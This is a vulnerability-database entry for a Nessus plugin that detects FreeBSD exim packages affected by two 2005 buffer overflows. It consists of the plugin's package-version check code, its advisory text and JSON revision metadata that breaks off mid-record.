FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)
2005-07-13T00:00:00
ID FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL Type nessus Reporter Tenable Modified 2018-11-23T00:00:00
Description
1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.
2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2018 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
# copyright notice, this list of conditions and the following
# disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
# published online in any format, converted to PDF, PostScript,
# RTF and other formats) must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
include("compat.inc");
# Registration phase: when `description` is set, the script only declares its
# metadata and leaves through the exit(0) at the end of this block, so none of
# the package checks further down run on this pass.
if (description)
{
# Plugin identity and revision stamp.
script_id(19118);
script_version("1.19");
script_cvs_date("Date: 2018/11/23 12:49:57");
# Advisory cross-references: two CVE ids and three Bugtraq ids.
script_cve_id("CVE-2005-0021", "CVE-2005-0022");
script_bugtraq_id(12185, 12188, 12268);
script_name(english:"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)");
# The finding is derived from the installed-package list, not from probing exim.
script_summary(english:"Checks for updated packages in pkg_info output");
script_set_attribute(
attribute:"synopsis",
value:
"The remote FreeBSD host is missing one or more security-related
updates."
);
# Advisory text (per the header, extracted from VuXML): an overflow in
# host_aton() on an IPv6 address with more than 8 components, and an overflow
# in spa_base64_to_bits() in the SPA authentication code.
script_set_attribute(
attribute:"description",
value:
"1. The function host_aton() can overflow a buffer if it is presented
with an illegal IPv6 address that has more than 8 components.
2. The second report described a buffer overflow in the function
spa_base64_to_bits(), which is part of the code for SPA
authentication."
);
# Reference links. The commented-out URL above a see_also entry appears to be
# the original location that the registered link replaces or shortens.
script_set_attribute(
attribute:"see_also",
value:"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html"
);
# http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377
script_set_attribute(
attribute:"see_also",
value:"https://marc.info/?l=bugtraq&m=110573573800377"
);
# https://vuxml.freebsd.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?60fdf1ac"
);
# The solution text is generic; the fixed package version is only encoded in
# the pkg_test() comparisons of the check phase ("<4.43+28_1").
script_set_attribute(attribute:"solution", value:"Update the affected packages.");
# CVSS v2 base vector: local access vector, low complexity, no authentication,
# complete confidentiality/integrity/availability impact. One vector is
# registered for both CVEs.
# NOTE(review): the advisory text in this file does not state the attack path
# of either overflow -- check the CVE records before relying on AV:L for triage.
script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
# NOTE(review): E:U is the CVSS v2 "unproven" exploitability value, which does
# not agree with the two exploit attributes registered right below ("Exploits
# are available" / "true") -- confirm which of the two is intended.
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
# Local check: the verdict comes from data collected on the host itself.
script_set_attribute(attribute:"plugin_type", value:"local");
# One package CPE per exim flavour tested in the check phase, plus the OS CPE.
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:exim");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:exim-ldap");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:exim-ldap2");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:exim-mysql");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:exim-postgresql");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:exim-sa-exim");
script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
# Disclosure and patch share a date; the plugin was published about six months later.
script_set_attribute(attribute:"vuln_publication_date", value:"2005/01/05");
script_set_attribute(attribute:"patch_publication_date", value:"2005/01/05");
script_set_attribute(attribute:"plugin_publication_date", value:"2005/07/13");
script_end_attributes();
# Information-gathering category.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"FreeBSD Local Security Checks");
# Declares ssh_get_info.nasl as a dependency and requires the same three KB
# keys that the check phase reads; presumably that dependency is what fills
# them in -- confirm against ssh_get_info.nasl.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
# Registration only: stop before the check phase.
exit(0);
}
include("audit.inc");
include("freebsd_package.inc");
# Check phase. Preconditions first, in order: local checks must be enabled,
# the host must have been identified as FreeBSD, and a package list must be
# present in the KB. Each missing key is reported through audit().
if (!get_kb_item("Host/local_checks_enabled"))
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release"))
  audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info"))
  audit(AUDIT_PACKAGE_LIST_MISSING);

# Every exim package flavour is compared against the same threshold,
# "<4.43+28_1". All six are always tested, in this order, so that
# save_report:TRUE can record each match for the final report.
flag = 0;
foreach exim_pkg (make_list(
  "exim",
  "exim-ldap",
  "exim-ldap2",
  "exim-mysql",
  "exim-postgresql",
  "exim-sa-exim"
))
{
  if (pkg_test(save_report:TRUE, pkg:exim_pkg + "<4.43+28_1"))
    flag++;
}

# No match: report the host as not affected. Otherwise raise the finding,
# attaching the collected package report when verbosity is above zero.
if (flag == 0) audit(AUDIT_HOST_NOT, "affected");
else
{
  if (report_verbosity > 0)
    security_hole(port:0, extra:pkg_report_get());
  else
    security_hole(0);
  exit(0);
}
{"id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "bulletinFamily": "scanner", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "published": "2005-07-13T00:00:00", "modified": "2018-11-23T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "reporter": "Tenable", "references": ["https://marc.info/?l=bugtraq&m=110573573800377", "http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?60fdf1ac"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "type": "nessus", "lastseen": "2019-02-21T01:08:40", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. 
The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "f5ca5f3e61266bee4ca07e961c1e56cd9ab0a3fe3964b4f796e58ea1d593b952", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "b09dad3a1a106eb7ecf8cc564c192cdc", "key": "cpe"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "cdf641b8180b4b9325d01eea40450b5e", "key": "references"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3c764d4cf584f9ded7aa4dcca57c78ff", "key": "modified"}, {"hash": "05087e0912dd2f79047b7dad601a2083", "key": "sourceData"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2018-11-13T17:07:16", "modified": "2018-11-10T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.3", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?60fdf1ac", "http://marc.info/?l=bugtraq&m=110573573800377"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 
2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/11/10 11:49:40\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. 
The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # https://vuxml.freebsd.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60fdf1ac\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["references", "modified", "sourceData"], "edition": 6, "lastseen": "2018-11-13T17:07:16"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "16815c800a3c847b124ff6cb5bc842e9837966a0b192fe482682aa2021e78082", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "b09dad3a1a106eb7ecf8cc564c192cdc", "key": "cpe"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "767faad1c1a0bac1dea68a1424024c69", "key": "sourceData"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "09cd0998f21b6811e8f5438ddcb628f2", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}, {"hash": "55b5f288c0c073cab7832e1f46b617e7", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2018-11-24T03:30:41", "modified": "2018-11-23T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.3", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["https://marc.info/?l=bugtraq&m=110573573800377", "http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", 
"http://www.nessus.org/u?60fdf1ac"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/23 12:49:57\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. 
The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # https://vuxml.freebsd.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60fdf1ac\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 7, "lastseen": "2018-11-24T03:30:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-01-16T20:06:13", "references": [{"idList": ["RHSA-2005:025"], "type": "redhat"}, {"idList": ["CA9CE879-5EBB-11D9-A01C-0050569F0001"], "type": "freebsd"}, {"idList": ["OPENVAS:52252", "OPENVAS:53472", "OPENVAS:53474", "OPENVAS:54809"], "type": "openvas"}, {"idList": ["CVE-2005-0022", "CVE-2005-0021"], "type": "cve"}, {"idList": ["SECURITYVULNS:DOC:7533", "SECURITYVULNS:DOC:7534"], "type": "securityvulns"}, {"idList": ["GLSA-200501-23"], "type": "gentoo"}, {"idList": ["EDB-ID:1009", "EDB-ID:756"], "type": "exploitdb"}, {"idList": ["DEBIAN:DSA-637-1:4973F", "DEBIAN:DSA-635-1:15035"], "type": "debian"}, {"idList": ["VU:132992"], "type": "cert"}, {"idList": ["FEDORA_2005-002.NASL", "EXIM_SPA_IPV6_OVERFLOW.NASL", "UBUNTU_USN-56-1.NASL", "REDHAT-RHSA-2005-025.NASL", "DEBIAN_DSA-637.NASL", "DEBIAN_DSA-635.NASL", "FEDORA_2005-001.NASL", "GENTOO_GLSA-200501-23.NASL"], "type": "nessus"}, {"idList": ["OSVDB:12727", "OSVDB:12726", "OSVDB:12946"], "type": "osvdb"}, {"idList": ["USN-56-1"], "type": "ubuntu"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "8a38930a33717e1309ac2ed5e2bac59ec62215dd2f37ff719246f630cc49a581", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "b09dad3a1a106eb7ecf8cc564c192cdc", "key": "cpe"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "767faad1c1a0bac1dea68a1424024c69", "key": "sourceData"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": 
